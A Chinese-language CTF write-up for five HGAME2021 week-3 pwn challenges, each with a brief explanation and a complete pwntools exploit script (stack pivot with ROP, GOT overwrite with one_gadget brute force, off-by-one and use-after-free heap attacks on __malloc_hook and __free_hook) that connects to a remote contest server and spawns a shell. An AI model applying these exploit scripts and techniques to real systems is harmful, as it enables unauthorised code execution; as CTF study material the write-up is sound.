一共放出五道题,都不是很难。

blackgive

  考栈转移,值得注意的一点是转移过去先填充几个ret,因为如果直接在转移过去的地方写rop链,执行起来会覆盖到上面的一些指针,导致程序不能正常输入和输出。我比较疑惑的是,我不清楚为什么我用system打不通,最后用one_gadgets才做出来。

 1 from pwn import *

 2

 3 p = remote('182.92.108.71',30459)

 4 libc = ELF('./libc.so.6')

 5 elf = ELF('./pwn')

 6 context(os='linux',arch='amd64',log_level='debug')

 7

 8 buf = 0x06010A0

 9 leave_ret = 0x04007A3

10 pop_rdi = 0x000400813

11 pop_rsi_r15 = 0x00400811

12 ret = 0x004007A4

13

14 payload = 'paSsw0rd\x00'

15 payload = payload.ljust(0x20,'\x00')+p64(buf)+p64(leave_ret)

16 p.sendafter(':',payload)

17

18 payload = p64(ret)*0x6+p64(pop_rdi)+p64(elf.got['puts'])

19 payload += p64(elf.plt['puts'])+p64(pop_rdi)+p64(0)

20 payload += p64(pop_rsi_r15)+p64(buf+0x78)+p64(0)

21 payload += p64(elf.plt['read'])

22 p.sendafter('right!\n',payload)

23

24 puts = u64(p.recv(6).ljust(8,'\x00'))

25 libc_base = puts-libc.symbols['puts']

26 binsh = libc_base+libc.search('/bin/sh').next()

27 system = libc_base+libc.symbols['system']

28 print 'libc_base-->'+hex(libc_base)

29 print 'binsh-->'+hex(binsh)

30 print 'system-->'+hex(system)

31

32 og = [0x4f3d5,0x4f432,0x10a41c]

33 shell = libc_base+og[1]

34 payload = p64(shell)

35 p.send(payload)

36 p.interactive()

without_leak

  题目关闭了标准输出和错误输出,导致不能泄露libc拿shell。

  在buu上面做过一道wustctf2020_closed,也是将标准输出和错误输出关闭了,不同点在于那道题是直接拿到了shell,而这道题还没有拿到shell。

  思路是改写got表,将close的got表改成one_gadget,然后再去执行close拿到shell,就和buu上面的那道题一样了。让流重定向,就可以正常的输出了。(经过测试,将read的got表改成one_gadget也可以拿到shell)

  至于为什么是read和close,就需要根据one_gadget和原来的got地址进行对比,发现这两个函数的got地址和one_gadget只相差两个字节,也就是四位,又因为后三位是固定的,所以有1/16的几率可以拿到shell。如果修改其他函数的got表,算了一下拿到shell的几率是1/4096,太难了,作为非洲酋长的我,深刻知道,自己有多脸黑。拿到shell之后执行exec 1>&0(或者是cat flag>&0),题目就做出来了,还侥幸拿了一血。

 1 from pwn import *

 2

 3 elf = ELF('./pwn',checksec="false")

 4 context.log_level = 'debug'

 5

 6 pop_rdi = 0x000401243

 7 pop_rsi_r15 = 0x00401241

 8 og = [0x4f3d5,0x4f432,0x10a41c]

 9 init = 0x040119B

10

11 while 1:

12     try:

13         p = remote('182.92.108.71',30483)

14         payload = 'a'*0x20+'bbbbbbbb'

15         payload += p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)

16         payload += p64(elf.got['close'])+p64(0)+p64(elf.plt['read'])

17         payload += p64(init)+p64(0x0401185)

18         p.sendafter('\n',payload)

19         p.send('\x1c\x34')

20         p.sendline('exec 1>&0')

21         p.sendline('ls')

22         p.recvuntil('flag')

23         break

24     except:

25         p.close()

26 p.sendline('cat flag')

27 p.recv()

28 p.interactive()

Library management System

  给了libc,发现是ubuntu16.04的环境。

  add函数中存在off by one,通过修改下一个chunk的size位,构造unsorted chunk,释放掉再申请回来,这步就成功泄露libc地址了,然后就是正常的做题,通过堆块重叠,修改fd地址,将chunk申请到__malloc_hook-0x23的位置,通过realloc抬栈,拿shell。做题的人都没有几个,这题拿了二血。

 1 from pwn import *

 2

 3 #p = process('./pwn')

 4 p = remote('182.92.108.71',30431)

 5 elf = ELF('./pwn')

 6 libc = ELF('./libc.so.6')

 7 context.log_level = 'debug'

 8

 9 def duan():

10     gdb.attach(p)

11     pause()

12 def add(size,content):

13     p.sendlineafter('choice: ','1')

14     p.sendlineafter('title: ',str(size))

15     p.sendafter('title: ',content)

16 def delete(index):

17     p.sendlineafter('choice: ','2')

18     p.sendlineafter('id: ',str(index))

19 def show(index):

20     p.sendlineafter('choice: ','3')

21     p.sendlineafter('id: ',str(index))

22

23 og = [0x45226,0x4527a,0xf0364,0xf1207]

24

25 add(0x18,'aaaaaaaa\n')

26 add(0x30,'bbbbbbbb\n')

27 add(0x68,'cccccccc\n')

28 add(0x10,'dddddddd\n')

29 delete(0)

30 add(0x18,'a'*0x18+'\xb1')

31 delete(1)

32 add(0x70,'aaaaaaaa\n')

33 show(1)

34 p.recvuntil('aaaaaaaa')

35 libc_base = u64(p.recv(6).ljust(8,'\x00'))-248-0x10-libc.symbols['__malloc_hook']

36 malloc_hook = libc_base+libc.symbols['__malloc_hook']

37 shell = libc_base+og[1]

38 realloc = libc_base+libc.symbols['realloc']

39 print 'libc_base-->'+hex(libc_base)

40 print 'malloc_hook-->'+hex(malloc_hook)

41 delete(2)

42 delete(1)

43 add(0x70,'aaaaaaaa'*6+p64(0)+p64(0x71)+p64(malloc_hook-0x23)+'\n')

44 add(0x68,'aaaaaaaa\n')

45 add(0x68,'a'*(0x13-8)+p64(shell)+p64(realloc+12)+'\n')

46 p.sendlineafter('choice: ','1')

47 p.sendlineafter('title: ','32')

48 p.interactive()

todolist

  出题人说这道题题目本身有问题,进行了降分处理。

  ubuntu18.04的,有uaf,很简单。

 1 from pwn import *

 2

 3 #p = process('./pwn')

 4 p = remote('182.92.108.71',30411)

 5 elf = ELF('./pwn')

 6 #libc = ELF('./libc.so.6')

 7 libc = ELF('./libc-2.27.so')

 8 context.log_level = 'debug'

 9

10 def duan():

11     gdb.attach(p)

12     pause()

13 def add(size):

14     p.sendlineafter('exit\n','1')

15     p.sendlineafter('write?\n',str(size))

16 def delete(index):

17     p.sendlineafter('exit\n','2')

18     p.sendlineafter('delete?\n',str(index))

19 def edit(index,size,content):

20     p.sendlineafter('exit\n','3')

21     p.sendlineafter('edit?\n',str(index))

22     p.sendlineafter('write?\n',str(size))

23     p.send(content)

24 def show(index):

25     p.sendlineafter('exit\n','4')

26     p.sendlineafter('check?\n',str(index))

27

28 #og = [0x4f365,0x4f3c2,0xe58b8,0xe58bf,0xe58c3,0x10a45c,0x10a468]

29 og = [0x4f3d5,0x4f432,0x10a41c]

30

31 add(0x410)

32 add(0x10)

33 delete(0)

34 show(0)

35 libc_base = u64(p.recvuntil('\x7f').ljust(8,'\x00'))-96-0x10-libc.symbols['__malloc_hook']

36 free_hook = libc_base+libc.symbols['__free_hook']

37 shell = libc_base+og[1]

38 print 'libc_base-->'+hex(libc_base)

39 print 'free_hook-->'+hex(free_hook)

40 delete(1)

41 edit(1,8,p64(free_hook))

42 add(0x10)

43 add(0x10)

44 edit(3,8,p64(shell))

45 delete(2)

46 p.interactive()

todolist2

  修改过后的题目,free之后把指针清0了,不存在uaf了。

  漏洞主要是在edit函数,在进行写的时候有整数溢出漏洞。

  通过edit函数可以进行溢出,覆盖fd指针,还是打__free_hook就可以拿到shell。

 1 from pwn import *

 2

 3 #p = process('./pwn')

 4 p = remote('182.92.108.71',30521)

 5 elf = ELF('./pwn')

 6 #libc = ELF('./libc.so.6')

 7 libc = ELF('./libc-2.27.so')

 8 context.log_level = 'debug'

 9

10 def duan():

11     gdb.attach(p)

12     pause()

13 def add(size):

14     p.sendlineafter('exit\n','1')

15     p.sendlineafter('write?\n',str(size))

16 def delete(index):

17     p.sendlineafter('exit\n','2')

18     p.sendlineafter('delete?\n',str(index))

19 def edit(index,size,content):

20     p.sendlineafter('exit\n','3')

21     p.sendlineafter('edit?\n',str(index))

22     p.sendlineafter('write?\n',str(size))

23     p.send(content)

24 def show(index):

25     p.sendlineafter('exit\n','4')

26     p.sendlineafter('check?\n',str(index))

27

28 #og = [0x4f365,0x4f3c2,0xe58b8,0xe58bf,0xe58c3,0x10a45c,0x10a468]

29 og = [0x4f3d5,0x4f432,0x10a41c]

30

31 add(0x410)    #0

32 add(0x10)    #1

33 delete(0)

34 add(0x410)    #2

35 show(2)

36 libc_base = u64(p.recvuntil('\x7f').ljust(8,'\x00'))-96-0x10-libc.symbols['__malloc_hook']

37 free_hook = libc_base+libc.symbols['__free_hook']

38 shell = libc_base+og[1]

39 print 'libc_base-->'+hex(libc_base)

40 print 'free_hook-->'+hex(free_hook)

41 add(0x10)

42 add(0x10)

43 delete(4)

44 edit(3,-1,'aaaaaaaa'*2+p64(0)+p64(0x21)+p64(free_hook)+'\n')

45 add(0x10)

46 add(0x10)

47 edit(6,8,p64(shell))

48 delete(5)

49 p.interactive()

后记

  花了一天的时间,把题目都做出来了,还拿了两个题的一血。第三周over!

HGAME2021 week3 pwn writeup的更多相关文章

  1. HGAME2021 week4 pwn writeup

    第四周只放出两道题,也不是很难. house_of_cosmos 没开pie,并且可以打got表. 在自写的输入函数存在漏洞.当a2==0时,因为时int类型,这里就会存在溢出.菜单题,但是没有输出功 ...

  2. HGAME2021 week2 pwn writeup

    week2一共有4道pwn题 killerqueen 有格式化字符串漏洞,题不算难,但是故事情节真实让人摸不着头脑,但是仔细分析分析,理清楚逻辑就可以做了. 第一次choose1的时候,可以输入0,泄 ...

  3. Jarvis OJ - 栈系列部分pwn - Writeup

    最近做了Jarvis OJ的一部分pwn题,收获颇丰,现在这里简单记录一下exp,分析过程和思路以后再补上 Tell Me Something 此题与level0类似,请参考level0的writeu ...

  4. 攻防世界新手区pwn writeup

    CGfsb 题目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5050 下载文 ...

  5. ISCC2018 Reverse & Pwn writeup

    Reference:L1B0 Re RSA256 春秋欢乐赛原题..flag都不变的 给了三个加密文件和公钥证书public.key,可以使用openssl进行处理 $openssl rsa -pub ...

  6. 虎符2021线下赛pwn writeup

    jdt 一个图书管理系统,但并不是常规的堆题.edit和show函数可以越界.edit函数和show函数相互配合泄露libc基地址,将main函数的返回地址覆盖成onegadgets拿shell. f ...

  7. NepCTF pwn writeup

    上周抽时间打了nepnep举办的CTF比赛,pwn题目出的挺不错的,适合我这种只会一点点选手做,都可以学到新东西. [签到] 送你一朵小红花 64位程序,保护全开. 程序会在buf[2]处留下一个da ...

  8. 2020ACTF pwn writeup

    为了打2021的ACTF,想着把2020年的pwn题做一做吧,发现2020年的pwn题质量还挺高的.反倒是2021年的题目质量不太高,好像是没有专门的pwn师傅出题,可以理解,毕竟办校赛,说白了就是用 ...

  9. SWPUCTF 2019 pwn writeup

    来做一下以前比赛的题目,下面两个题目都可以在buu复现(感谢赵总). SWPUCTF_2019_login 32位程序,考点是bss段上的格式化字符串.用惯onegadgets了,而对于32位程序来说 ...

随机推荐

  1. [gym102412D]The Jump from Height of Self-importance to Height of IQ Level

    考虑使用平衡树维护该序列,操作显然可以用fhq treap的分裂+合并来实现 进一步的,问题即变为维护哪些信息来支持push up的操作(并判定是否存在$a_{i}<a_{j}<a_{k} ...

  2. [spojQTREE6]Query on a tree VI

    考虑如下构造: 新建一条边$(0,1)$,并将原树以0为根建树,记$fa_{x}$为$x$的父亲(其中$1\le x\le n$) 维护两棵森林,分别记作$T_{0/1}$,每一条边恰属于一棵,其中$ ...

  3. 面试官又整新活,居然问我for循环用i++和++i哪个效率高?

    原创:微信公众号 码农参上,欢迎分享,转载请保留出处. 前几天,一个小伙伴告诉我,他在面试的时候被面试官问了这么一个问题: 在for循环中,到底应该用 i++ 还是 ++i ? 听到这,我感觉这面试官 ...

  4. 关于前端项目cookie的获取

    最近项目在做切换,2.0要升级到3.0,遇到跨域问题,使用的是nginx 进行对端口拦截请求其他地址,另外有的服务还要登录权限,之前没看到有这个,后来加上获取cookie的请求 var v3_toke ...

  5. LOJ 3066 - 「ROI 2016 Day2」快递(线段树合并+set 启发式合并)

    LOJ 题面传送门 人傻常数大,需要狠命卡--/wq/wq 画个图可以发现两条路径相交无非以下两种情况(其中红色部分为两路径的重叠部分,粉色.绿色的部分分别表示两条路径): 考虑如何计算它们的贡献,对 ...

  6. Anaconda 安装与卸载

    Anaconda是一个免费开源的Python和R语言的发行版本,用于计算科学(数据科学.机器学习.大数据处理和预测分析),Anaconda致力于简化软件包管理系统和部署.Anaconda的包使用软件包 ...

  7. [R]在dplyr函数的基础上编写函数-(3)tidyeval

    dplyr的优点很明显,数据框操作简洁,如filter(df, x == 1, y == 2, z == 3)等于df[df$x == 1 & df$y ==2 & df$z == 3 ...

  8. 【Python小试】使用列表解析式简化代码

    列表解析式的好处: 代码简洁 可读性强 运行快 示例 来自<Python编程>中的一个例子:同时投掷两颗面数不同的骰子(如一个6面的D6和一个10面的D10)n次,统计两个骰子点数之和,并 ...

  9. C 语言do while 循环

    do while 循环小练习 1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main(void) 5 { 6 int a ...

  10. MEGA软件——系统发育树构建方法(图文讲解) 转载

    转载:http://www.plob.org/2012/12/02/4927.html 一.序列文本的准备 构树之前先将目标基因序列都分别保存为txt文本文件中(或者把所有序列保存在同一个txt文本中 ...